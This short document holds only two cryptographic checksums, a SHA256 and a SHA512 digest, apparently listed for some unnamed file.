SHA256a737a103a2b7396e33af00cfb4522bfd51538f16d6b2756a440298d3ba4590fc
SHA5129b5d2b7e00de45894876bc9cf4d115a0d39fa4b67a503f5a8fe3843c36db575c5f52cc68b98c27324ecce1d483cbeea988984687dc0d1338984677c3619531e2